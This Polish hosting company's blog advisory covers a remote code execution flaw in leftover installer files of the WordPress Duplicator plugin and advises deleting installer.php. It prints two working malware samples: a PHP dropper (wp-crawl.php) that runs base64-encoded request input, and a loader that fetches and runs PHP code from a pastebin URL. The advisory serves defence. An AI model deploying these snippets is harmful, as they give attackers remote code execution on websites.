Podatność we wtyczce Duplicator WP

Wrzesień 11, 2018 11:11


img

W popularnej wtyczce WordPress służącej do migracji/kopii zapasowej – Duplicator wykryto podatność na zdalne wykonanie kodu na serwerze (Remote Code Execution), która pozwala zmodyfikować plik wp-config.php i wprowadzić tam złośliwy kod PHP.

Co ważne: Podatność w tym przypadku nie występuje w samym katalogu wtyczki Duplicator. Usterka ujawnia się podczas używania wtyczki Duplicator do migracji lub przywracania kopii zapasowej witryny WordPress.

Podatność znajduje się w plikach instalatora migracji – dlatego istotne jest aby usunąć je zaraz po przeprowadzeniu ‚Restore’ z kopii zapasowej, gdyż wspomniane zdalne wykonanie kodu jest możliwe właśnie dzięki nieumyślnemu pozostawieniu plików po-instalacyjnych na serwerze. Jeśli wykonamy wdrożenie z kopii migracyjnej – pliki te należy usunąć.

Opis i dowód podatności:

Więcej o śledztwie i dowodzie podatności można przeczytać (tekst w jęz. angielskim) w dokumencie, który przygotował synacktiv.com

WordPress_Duplicator-1.2.40-RCE

Aby jednak wyeliminować ryzyko ataku, możesz sprawdzić folder główny swojej witryny i usunąć plik installer.php. To nie jest istotny plik Twojej strony internetowej, to pozostałość po migracji witryny za pomocą wtyczki Duplicator.

Ważne dla bezpieczeństwa! Używając wtyczki Duplicator, pamiętajmy o usunięciu plików instalacyjnych po wykonaniu Przywrócenia (sama wtyczka nam o tym przypomni). Pozostawienie plików instalacyjnych kopii zapasowej na serwerze to poważny błąd.

A generalnie najlepszą metodą jest nie tyle co wyłączanie ale usuwanie wtyczek, których nie używamy.

wp-crawl.php

Istnieje wiele prób włamań do tej luki i powiązane z nim także nowe złośliwe oprogramowanie wp-crawl.php, które umożliwia przesłanie więcej złośliwego kodu na serwer i jego wykonanie, a następnie samoistne usunięcie siebie:

<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');

tempcrawl

<?php $c1 = "https://pastebin.com/raw/6e57ZX4p"; $b = "/tmp/dsgdhgf"; @file_put_contents($b,"<?php ".@file_get_contents($c1)); include($b);@unlink($b);

My blokujemy takie ataki!

Filtry MalwareExperts, którymi chronimy w HitMe serwery naszych klientów z powodzeniem wykrywają to zagrożenie i uniemożliwiają wykonanie złośliwego kodu.

Zachęcamy do korzystania z naszych usług hostingowych aby zwiększyć ochronę swoich stron WWW dzięki narzędziom jakie stosujemy CloudLinux, Malware Expert, imunify 360!

Czytaj więcej o wdrożonym w HitMe rozwiązaniu MalwareExperts!

Polecamy artykuł: HitMe o MalwareExperts

Śledź nas na Facebooku oraz sprawdzaj informacje tu na naszym blogu.